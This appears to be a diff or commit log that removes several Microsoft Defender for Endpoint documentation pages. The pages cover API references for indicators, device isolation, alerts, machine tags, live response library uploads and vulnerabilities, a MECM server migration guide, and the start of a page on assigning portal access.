- "Sha1": "87662bc3d60e4200ceaf7aae249d1c343f4b83c9"
-}
-```
security Ti Indicator https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/ti-indicator.md
- Title: Indicator resource type
-description: Specify the entity details and define the expiration of the indicator using Microsoft Defender for Endpoint.
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# Indicator resource type
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
----- See the corresponding [Indicators page](https://securitycenter.windows.com/preferences2/custom_ti_indicators/files) in the portal.-
-Method|Return Type|Description
-:|:|:
-[List Indicators](get-ti-indicators-collection.md)|[Indicator](ti-indicator.md) Collection|List [Indicator](ti-indicator.md) entities.
-[Submit Indicator](post-ti-indicator.md)|[Indicator](ti-indicator.md)|Submit or update [Indicator](ti-indicator.md) entity.
-[Import Indicators](import-ti-indicators.md)|[Indicator](ti-indicator.md) Collection|Submit or update [Indicators](ti-indicator.md) entities.
-[Delete Indicator](delete-ti-indicator-by-id.md)|No Content|Deletes [Indicator](ti-indicator.md) entity.
-
-## Properties
-
-|Property|Type|Description |
-|||--|
-|id|String|Identity of the [Indicator](../ti-indicator.md) entity.|
-|indicatorValue|String|The value of the [Indicator](../ti-indicator.md).|
-|indicatorType|Enum|Type of the indicator. Possible values are: `FileSha1`, `FileSha256`, `FileMd5`, `CertificateThumbprint`, `IpAddress`, `DomainName`, and `Url`.|
-|application|String|The application associated with the indicator.|
-|action|Enum|The action that is taken if the indicator is discovered in the organization. Possible values are: `Warn`, `Block`, `Audit`, `Alert`, `AlertAndBlock`, `BlockAndRemediate`, and `Allowed`.|
-|externalID|String|Id the customer can submit in the request for custom correlation.|
-|sourceType|Enum|`User` in case the Indicator created by a user (for example, from the portal), `AadApp` in case it submitted using automated application via the API.|
-|createdBySource|string|The name of the user/application that submitted the indicator.|
-|createdBy|String|Unique identity of the user/application that submitted the indicator.|
-|lastUpdatedBy|String|Identity of the user/application that last updated the indicator.|
-|creationTimeDateTimeUtc|DateTimeOffset|The date and time when the indicator was created.|
-|expirationTime|DateTimeOffset|The expiration time of the indicator.|
-|lastUpdateTime|DateTimeOffset|The last time the indicator was updated.|
-|severity|Enum|The severity of the indicator. Possible values are: `Informational`, `Low`, `Medium`, and `High`.|
-|title|String|Indicator title.|
-|description|String|Description of the indicator.|
-|recommendedActions|String|Recommended actions for the indicator.|
-|rbacGroupNames|List of strings|RBAC device group names where the indicator is exposed and active. Empty list in case it exposed to all devices.|
-|rbacGroupIds|List of strings|RBAC device group IDs where the indicator is exposed and active. Empty list in case it exposed to all devices.|
-|generateAlert|Enum|**True** if alert generation is required, **False** if this indicator shouldn't generate an alert.|
-
-## Indicator Types
-
-The indicator action types supported by the API are:
--- Allowed-- Audit-- Block-- BlockAndRemediate-- Warn (Defender for Cloud Apps only)-
-For more information on the description of the response action types, see [Create indicators](../manage-indicators.md).
-
-> [!NOTE]
->
-> The prior response actions (AlertAndBlock, and Alert) will be supported until January 2022. After this date, all customers must be use one of the action types listed in this section.
-
-## Json representation
-
-```json
-{
- "id": "994",
- "indicatorValue": "881c0f10c75e64ec39d257a131fcd531f47dd2cff2070ae94baa347d375126fd",
- "indicatorType": "FileSha256",
- "action": "AlertAndBlock",
- "application": null,
- "source": "user@contoso.onmicrosoft.com",
- "sourceType": "User",
- "createdBy": "user@contoso.onmicrosoft.com",
- "severity": "Informational",
- "title": "Michael test",
- "description": "test",
- "recommendedActions": "nothing",
- "creationTimeDateTimeUtc": "2019-12-19T09:09:46.9139216Z",
- "expirationTime": null,
- "lastUpdateTime": "2019-12-19T09:09:47.3358111Z",
- "lastUpdatedBy": null,
- "rbacGroupNames": ["team1"]
-}
-```
-
-## See also
--- [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](../defender-endpoint-antivirus-exclusions.md)-
security Unisolate Machine https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/unisolate-machine.md
- Title: Release device from isolation API
-description: Use this API to create calls related to release a device from isolation.
------- m365-security-- tier3-- must-keep--- Previously updated : 04/17/2024--
-# Release device from isolation API
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-## API description
-
-Undo isolation of a device.
-
-## Limitations
-
-1. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.
--
-> [!IMPORTANT]
->
-> - Full isolation is available for devices on Windows 10, version 1703.
-> - Full isolation is available in **public preview** for all supported Microsoft Defender for Endpoint on Linux listed in [System requirements](../microsoft-defender-endpoint-linux.md#system-requirements).
-> - Selective isolation is available for devices on Windows 10, version 1709 or later.
-> - When isolating a device, only certain processes and destinations are allowed. Therefore, devices that are behind a full VPN tunnel won't be able to reach the Microsoft Defender for Endpoint cloud service after the device is isolated. We recommend using a split-tunneling VPN for Microsoft Defender for Endpoint and Microsoft Defender Antivirus cloud-based protection-related traffic.
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md)
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|Machine.Isolate|'Isolate machine'
-Delegated (work or school account)|Machine.Isolate|'Isolate machine'
-
-> [!NOTE]
-> When obtaining a token using user credentials:
->
-> - The user needs to have at least the following role permission: 'Active remediation actions' (See [Create and manage roles](../user-roles.md) for more information)
-> - The user needs to have access to the device, based on device group settings (See [Create and manage device groups](../machine-groups.md) for more information)
->
-> Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.
-
-## HTTP request
-
-```http
-POST https://api.security.microsoft.com/api/machines/{id}/unisolate
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization|String|Bearer {token}. **Required**.
-Content-Type|string|application/json. **Required**.
-
-## Request body
-
-In the request body, supply a JSON object with the following parameters:
-
-Parameter|Type|Description
-:|:|:
-Comment|String|Comment to associate with the action. **Required**.
-
-## Response
-
-If successful, this method returns 201 - Created response code and [Machine Action](machineaction.md) in the response body.
-
-If you send multiple API calls to remove isolation for the same device, it returns "pending machine action" or HTTP 400 with the message "Action is already in progress".
-
-## Example
-
-### Request
-
-Here is an example of the request.
-
-```http
-POST https://api.security.microsoft.com/api/machines/1e5bc9d7e413ddd7902c2932e418702b84d0cc07/unisolate
-```
-
-```json
-{
- "Comment": "Unisolate machine since it was clean and validated"
-}
-```
-
-To isolate a device, see [Isolate device](isolate-machine.md).
security Unrestrict Code Execution https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/unrestrict-code-execution.md
- Title: Remove app restriction API
-description: Use this API to create calls related to removing a restriction from applications from executing.
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# Remove app restriction API
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
----
-## API description
-
-Enable execution of any application on the device.
-
-## Limitations
-
-1. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.
--
-> [!IMPORTANT]
->
-> - Full isolation is available for devices on Windows 10, version 1703.
-> - Selective isolation is available for devices on Windows 10, version 1709 or later.
-> - When isolating a device, only certain processes and destinations are allowed. Therefore, devices that are behind a full VPN tunnel won't be able to reach the Microsoft Defender for Endpoint cloud service after the device is isolated. We recommend using a split-tunneling VPN for Microsoft Defender for Endpoint and Microsoft Defender Antivirus cloud-based protection-related traffic.
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md)
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|Machine.RestrictExecution|'Restrict code execution'
-Delegated (work or school account)|Machine.RestrictExecution|'Restrict code execution'
-
-> [!NOTE]
-> When obtaining a token using user credentials:
->
-> - The user needs to have at least the following role permission: 'Active remediation actions' (See [Create and manage roles](../user-roles.md) for more information)
-> - The user needs to have access to the device, based on device group settings (See [Create and manage device groups](../machine-groups.md) for more information)
->
-> Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.
-
-## HTTP request
-
-```http
-POST https://api.securitycenter.microsoft.com/api/machines/{id}/unrestrictCodeExecution
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization|String|Bearer {token}. **Required**.
-Content-Type|string|application/json. **Required**.
-
-## Request body
-
-In the request body, supply a JSON object with the following parameters:
-
-Parameter|Type|Description
-:|:|:
-Comment|String|Comment to associate with the action. **Required**.
-
-## Response
-
-If successful, this method returns 201 - Created response code and [Machine Action](machineaction.md) in the response body.
-
-If you send multiple API calls to remove app restrictions for the same device, it returns "pending machine action" or HTTP 400 with the message "Action is already in progress".
-
-## Example
-
-### Request
-
-Here is an example of the request.
-
-```http
-POST https://api.securitycenter.microsoft.com/api/machines/1e5bc9d7e413ddd7902c2932e418702b84d0cc07/unrestrictCodeExecution
-```
-
-```json
-{
- "Comment": "Unrestrict code execution since machine was cleaned and validated"
-}
-
-```
-
-To restrict code execution on a device, see [Restrict app execution](restrict-code-execution.md).
security Update Alert https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/update-alert.md
- Title: Update alert entity API
-description: Learn how to update a Microsoft Defender for Endpoint alert by using this API. You can update the status, determination, classification, and assignedTo properties.
------- m365-security-- tier3-- must-keep--- Previously updated : 11/17/2023--
-# Update alert
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-## API description
-Updates properties of existing [Alert](alerts.md).
-
-Submission of **comment** is available with or without updating properties.
-
-Updatable properties are: `status`, `determination`, `classification`, and `assignedTo`.
-
-## Limitations
-
-1. You can update alerts that available in the API. For more information, see [List Alerts](get-alerts.md).
-2. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md)
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|Alerts.ReadWrite.All|'Read and write all alerts'
-Delegated (work or school account)|Alert.ReadWrite|'Read and write alerts'
-
-> [!NOTE]
-> When obtaining a token using user credentials:
->
-> - The user needs to have at least the following role permission: 'Alerts investigation' (For more information, see [Create and manage roles](../user-roles.md))
-> - The user needs to have access to the device associated with the alert, based on device group settings (For more information, see [Create and manage device groups](../machine-groups.md)
->
-> Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.
-
-## HTTP request
-
-```http
-PATCH /api/alerts/{id}
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization|String|Bearer {token}. **Required**.
-Content-Type|String|application/json. **Required**.
-
-## Request body
-
-In the request body, supply the values for the relevant fields that should be updated.
-
-Existing properties that aren't included in the request body will maintain their previous values or be recalculated based on changes to other property values.
-
-For best performance, you shouldn't include existing values that haven't change.
-
-Property|Type|Description|
-:|:|:
-Status|String|Specifies the current status of the alert. The property values are: 'New', 'InProgress' and 'Resolved'.|
-assignedTo|String|Owner of the alert|
-Classification|String|Specifies the specification of the alert. The property values are: `TruePositive`, `InformationalExpectedActivity`, and `FalsePositive`.|
-Determination|String|Specifies the determination of the alert. <p>Possible determination values for each classification are: <br><li> <b>True positive</b>: `Multistage attack` (MultiStagedAttack), `Malicious user activity` (MaliciousUserActivity), `Compromised account` (CompromisedUser) ΓÇô consider changing the enum name in public api accordingly, `Malware` (Malware), `Phishing` (Phishing), `Unwanted software` (UnwantedSoftware), and `Other` (Other). <li> <b>Informational, expected activity:</b> `Security test` (SecurityTesting), `Line-of-business application` (LineOfBusinessApplication), `Confirmed activity` (ConfirmedActivity) - consider changing the enum name in public api accordingly, and `Other` (Other). <li> <b>False positive:</b> `Not malicious` (NotMalicious) - consider changing the enum name in public api accordingly, `Not enough data to validate` (InsufficientData), and `Other` (Other).|
-Comment|String|Comment to be added to the alert.|
-
-> [!NOTE]
-> Around August 29, 2022, previously supported alert determination values ('Apt' and 'SecurityPersonnel') will be deprecated and no longer available via the API.
-
-## Response
-
-If successful, this method returns 200 OK, and the [alert](alerts.md) entity in the response body with the updated properties. If alert with the specified ID wasn't found - 404 Not Found.
-
-## Example
-
-### Request
-
-Here's an example of the request.
-
-```http
-PATCH https://api.securitycenter.microsoft.com/api/alerts/121688558380765161_2136280442
-```
-
-```json
-{
- "status": "Resolved",
- "assignedTo": "secop2@contoso.com",
- "classification": "FalsePositive",
- "determination": "Malware",
- "comment": "Resolve my alert and assign to secop2"
-}
-```
security Update Machine Method https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/update-machine-method.md
- Title: Update machine entity API
-description: Learn how to update machine tags by using this API. You can update the tags and devicevalue properties.
------- m365-security-- tier3-- must-keep--- Previously updated : 06/11/2021--
-# Update machine
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-## API description
-
-Updates properties of existing [Machine](machine.md).
-
-Updatable properties are: `machineTags` and `deviceValue`.
-
-## Limitations
-
-1. You can update machines that are available in the API.
-2. Update machine only appends tags to the tag collection. If tags exist, they must be included in the tags collection in the body.
-3. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md)
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|Machine.ReadWrite.All|'Read and write machine information for all machines'
-Delegated (work or school account)|Machine.ReadWrite|'Read and write machine information'
-
-> [!NOTE]
-> When obtaining a token using user credentials:
-> - The user needs to have at least the following role permission: 'Alerts investigation'. For more information, see [Create and manage roles](../user-roles.md).
-> - The user needs to have access to the device associated with the alert, based on device group settings. For more information, see [Create and manage device groups](../machine-groups.md).
->
-> Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.
-
-## HTTP request
-
-```http
-PATCH /api/machines/{machineId}
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization|String|Bearer {token}. **Required**.
-Content-Type|String|application/json. **Required**.
-
-## Request body
-
-In the request body, supply the values for the relevant fields that should be updated.
-
-Existing properties that aren't included in the request body will maintain their previous values or be recalculated based on changes to other property values.
-
-For best performance, you shouldn't include existing values that haven't change.
-
-Property|Type|Description
-:|:|:
-machineTags|String collection|Set of [machine](machine.md) tags.
-deviceValue|Nullable Enum|The [value of the device](../tvm-assign-device-value.md). Possible values are: 'Normal', 'Low' and 'High'.
-
-## Response
-
-If successful, this method returns 200 OK, and the [machine](machine.md) entity in the response body with the updated properties.
-
-If machine tags collection in body doesn't contain existing machine tags - replaces all tags with the tags provided in the request body.
-
-If machine with the specified ID wasn't found - 404 Not Found.
-
-## Example
-
-### Request
-
-Here's an example of the request.
-
-```http
-PATCH https://api.securitycenter.microsoft.com/api/machines/{machineId}
-```
-
-```json
-{
- "deviceValue": "Normal",
- "machineTags": [
- "Demo Device",
- "Generic User Machine - Attack Source",
- "Windows 10" "Windows11",
- "Windows Insider - Fast"
- ]
-}
-```
security Upload Library https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/upload-library.md
- Title: Upload files to the live response library
-description: Learn how to upload a file to the live response library.
--- NOCSH------ m365-security-- tier2-- must-keep--- Previously updated : 04/17/2024--
-# Upload files to the live response library
--
-**Applies to:**
-- [Microsoft Defender for Endpoint](/microsoft-365/security/defender-endpoint/microsoft-defender-endpoint)--
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://www.microsoft.com/microsoft-365/windows/microsoft-defender-atp?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-## API description
-
-Upload file to live response library.
-
-## Limitations
-
-1. File max size limitation is 20MB.
-
-2. Rate limitations for this API are 100 calls per minute and 1500 calls per
- hour.
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more,
-including how to choose permissions, see [Get started](apis-intro.md).
-
-| Permission type | Permission | Permission display name |
-||-|--|
-| Application | Library.Manage | Manage live response library |
-| Delegated (work or school account) | Library.Manage | Manage live response library |
-
-## HTTP request
-
-Upload
-
-```HTTP
-POST https://api.security.microsoft.com/api/libraryfiles
-```
-
-## Request headers
-
-| Name | Type | Description |
-|--|--|--|
-| Authorization | String | Bearer\<token>. Required. |
-| Content-Type | string | multipart/form-data. Required. |
-
-## Request body
-
-In the request body, supply a form-data object with the following parameters:
-
-| Parameter | Type | Description |
-|--|--||
-| File | File content | The file to be uploaded to live response library.Required |
-| Description | String | Description of the file. |
-| ParametersDescription | String | (Optional) Parameters required for the script to run. Default value is an empty string. |
-| OverrideIfExists | Boolean | (Optional) Whether to override the file if it already exists. Default value is an empty string. |
-
-## Response
--- If successful, this method returns 200 - OK response code and the uploaded
- live response library entity in the response body.
--- If not successful: this method returns 400 - Bad Request.
- Bad request usually indicates incorrect body.
-
-## Example
-
-Request
-
-Here is an example of the request using curl.
-
-```CURL
-curl -X POST https://api.security.microsoft.com/api/libraryfiles -H
-"Authorization: Bearer \$token" -F "file=\@mdatp1.png" -F
-"ParametersDescription=test"
--F "HasParameters=true" -F "OverrideIfExists=true" -F "Description=test
-description"
-```
-
-## Related topic
--- [Run live response](run-live-response.md)
security User https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/user.md
- Title: User resource type
-description: Retrieve recent Microsoft Defender for Endpoint alerts related to users.
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# User resource type
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
---
-Method|Return Type|Description
-||
-[List User related alerts](get-user-related-alerts.md)|[alert](alerts.md) collection|List all the alerts that are associated with a [user](user.md).
-[List User related devices](get-user-related-machines.md)|[machine](machine.md) collection|List all the devices that were logged on by a [user](user.md).
security Vulnerability https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/vulnerability.md
- Title: Vulnerability methods and properties
-description: Retrieves vulnerability information
------- m365-security-- tier3-- must-keep--- Previously updated : 12/18/2020--
-# Vulnerability resource type
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-pullalerts-abovefoldlink)
----
-## Methods
-
-Method|Return Type|Description
-:|:|:
-[Get all vulnerabilities](get-all-vulnerabilities.md)|Vulnerability collection|Retrieves a list of all the vulnerabilities affecting the organization
-[Get vulnerability by Id](get-vulnerability-by-id.md)|Vulnerability|Retrieves vulnerability information by its Id
-[List devices by vulnerability](get-machines-by-vulnerability.md)|MachineRef collection|Retrieve a list of devices that are associated with the vulnerability Id
-[List vulnerabilities by machine and software](get-all-vulnerabilities-by-machines.md)|Vulnerability|Retrieves a list of all the vulnerabilities affecting the organization per machine and software.
-
-## Properties
-
-Property|Type|Description
-:|:|:
-Id|String|Vulnerability Id
-Name|String|Vulnerability title
-Description|String|Vulnerability description
-Severity|String|Vulnerability Severity. Possible values are: **Low**, **Medium**, **High**, or **Critical**
-cvssV3|Double|CVSS v3 score
-cvssVector|String| A compressed textual representation that reflects the values used to derive the score
-exposedMachines|Long|Number of exposed devices
-publishedOn|DateTime|Date when vulnerability was published
-updatedOn|DateTime|Date when vulnerability was updated
-publicExploit|Boolean|Public exploit exists
-exploitVerified|Boolean|Exploit is verified to work
-exploitInKit|Boolean|Exploit is part of an exploit kit
-exploitTypes|String collection|Exploit affect. Possible values are: **Local privilege escalation**, **Denial of service**, or **Local**
-exploitUris|String collection|Exploit source URLs
-CveSupportability| String collection| Possible values are: **Supported**, **Not Supported**, or **SupportedInPremium**
-
security Application Deployment Via Mecm https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/application-deployment-via-mecm.md
- Title: Migrating servers from Microsoft Monitoring Agent to the unified solution
-description: Learn how to migrate down-level servers from Microsoft Monitoring Agent to the new unified solution step-by-step from this article.
------- m365-security-- tier1- Previously updated : 06/27/2022--
-# Migrating servers from Microsoft Monitoring Agent to the unified solution
-
-**Applies to:**
--- Windows Server 2012 R2-- Windows Server 2016-
-This article guides you in migrating down-level servers from Microsoft Monitoring Agent (MMA) to the unified solution.
-
-## Prerequisites
--- Microsoft Endpoint Configuration Manager (MECM) higher than 2207.-- Down-level OS devices in your environment onboarded with Microsoft Monitoring Agent. To confirm, verify that `MsSenseS.exe` is running in Task Manager.-- Presence of the MMA agent. You can verify it by checking if the correct Workspace ID is present in the Control Panel> Microsoft Monitoring Agent.-- Active Microsoft Defender portal with devices onboarded.-- A **Device Collection** containing down-level servers such as Windows Server 2012 R2 or Windows Server 2016 using MMA agent is set up in your MECM instance.-
-For more information on installing the listed prerequisites, see [related topics](#related-topics) section.
-
-## Gather required files
-
-Copy the unified solution package, onboarding script and migration script to the same content source you deploy other apps with MECM.
-
-1. Download Onboarding Script and the unified solution from [Microsoft Defender XDR settings page](https://sip.security.microsoft.com/preferences2/onboarding).
- :::image type="content" source="media/onboarding-script.png" alt-text="Screenshot of onboarding script and unified solution download" lightbox="media/onboarding-script.png":::
- > [!Note]
- > You must select the Group Policy from the Deployment method dropdown to obtain the .cmd file.
-2. Download the migration script from the document: [Server migration scenarios from the previous, MMA-based Microsoft Defender for Endpoint solution](server-migration.md). This script can also be found on GitHub: [GitHub - microsoft/mdefordownlevelserver](https://github.com/microsoft/mdefordownlevelserver).
-3. Save all three files in a shared folder used by MECM as a Software Source.
-
- :::image type="content" source="media/ua-migration.png" alt-text="Screenshot of saving the shared folder by MECM.":::
-
-## Create the package as an application
-
-1. In the MECM console, follow these steps: **Software Library>Applications>Create Application**.
-2. Select **Manually specify the application information**.
- :::image type="content" source="media/manual-application-information.png" alt-text="Screenshot of manually specifying the application information selection." lightbox="media/manual-application-information.png":::
-3. Select **Next** on the Software Center screen of the wizard.
-4. On the Deployment Types, click **Add**.
-5. Select **Manually to specify the deployment type information** and select **Next**.
-6. Give a name to your script deployment and select **Next**.
-
- :::image type="content" source="media/manual-deployment-information.png" alt-text="Screenshot specifying the script deployment information.":::
-7. On this step, copy the UNC path that your content is located. Example: `\\ServerName\h$\SOFTWARE_SOURCE\path`.
-
- :::image type="content" source="media/deployment-type-wizard.png" alt-text="Screenshot that shows UNC path copy.":::
-
-8. Additionally, set the following as the installation program:
-
- ```powershell
- Powershell.exe -ExecutionPolicy ByPass -File install.ps1 -RemoveMMA <workspace ID> -OnboardingScript .\WindowsDefenderATPOnboardingScript.cmd
- ```
-
- Click **Next** and make sure to add your own Workspace ID in this section.
-9. Click **Next** and click add a clause.
-10. The detection method will be based on the registry key shown below.
- `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sense`
-
- Check the option: **This registry setting must exit on the target system to indicate presence of this application.**
-
- :::image type="content" source="media/detection-wizard.png" alt-text="Screenshot that shows detection type wizard":::
-
- > [!TIP]
- > The registry key value was obtained by running the Powershell command shown below on a device that has the unified solution installed. Other creative methods of detection can also be used. The goal is to identify whether the unified solution has already been installed on a specific device. You can leave the Value and Data Type fields as blank.
-
- ```powershell
- get-wmiobject Win32_Product | Sort-Object -Property Name |Format-Table IdentifyingNumber, Name, LocalPackage -AutoSize
- ```
-
-11. In the **User Experience** section, check the recommended settings shown in the screenshot. You can choose what suits your environment and click **Next**. For **Installation program visibility**, it's advisable to install with **Normal** during phase testing then change it to **Minimized** for general deployment.
-
- > [!TIP]
- > The maximum allowed runtime can be lowered from (default) 120 minutes to 60 minutes.
-
- :::image type="content" source="media/user-experience-in-deployment-type-wizard.png" alt-text="Screenshot that shows user experience in deployment-type wizard.":::
-
-12. Add any additional requirements then select **Next**.
-13. Under the Dependencies section, select **Next**.
-14. Select **Next** until completion screen comes up, then **Close**.
-15. Keep select **Next** until the completion of Application Wizard. Verify all have been green checked.
-16. Close the wizard, right-click on the recently created application and deploy it to your down-level-server collection. Locally, the installation can be confirmed at Software Center. For details, check the CM logs at `C:\Windows\CCM\Logs\AppEnforce.log`.
-
- :::image type="content" source="media/deploy-application.png" alt-text="Screenshot that shows deployment of created application." lightbox="media/deploy-application.png":::
-
-17. Verify the status of the migration at MECM > Monitoring > Deployments.
-
- :::image type="content" source="media/deployment-status.png" alt-text="Screenshot that shows deployment status check." lightbox="media/deployment-status.png":::
-
-18. Troubleshooting .ETL files will be created and automatically saved locally in each server at this location `C:\Windows\ccmcache\#\`. These files can be leveraged by support to troubleshoot onboarding issues.
-
-## Related topics
--- [Microsoft Monitoring Agent Setup](/services-hub/health/mma-setup)-- [Deploy applications - Configuration Manager](/mem/configmgr/apps/deploy-use/deploy-applications)-- [Microsoft Defender for Endpoint - Configuration Manager](/mem/configmgr/protect/deploy-use/defender-advanced-threat-protection)-- [Onboard Windows servers to the Microsoft Defender for Endpoint service](configure-server-endpoints.md)-- [Microsoft Defender for Endpoint: Defending Windows Server 2012 R2 and 2016](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/defending-windows-server-2012-r2-and-2016/ba-p/2783292)
security Assign Portal Access https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/assign-portal-access.md
- Title: Assign user access
-description: Assign read and write or read only access to the Microsoft Defender for Endpoint portal.
-------- m365-security-- tier2- Previously updated : 3/30/2023--
-# Assign user access
---
-**Applies to:**
-- Microsoft Entra ID-- Office 365-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-assignaccess-abovefoldlink)
-
-Defender for Endpoint supports two ways to manage permissions:
--- **Basic permissions management**: Set permissions to either full access or read-only.-- **Role-based access control (RBAC)**: Set granular permissions by defining roles, assigning Microsoft Entra user groups to the roles, and granting the user groups access to device groups. For more information on RBAC, see [Manage portal access using role-based access control](rbac.md).-
-> [!NOTE]
-> If you have already assigned basic permissions, you may switch to RBAC anytime. Consider the following before making the switch:
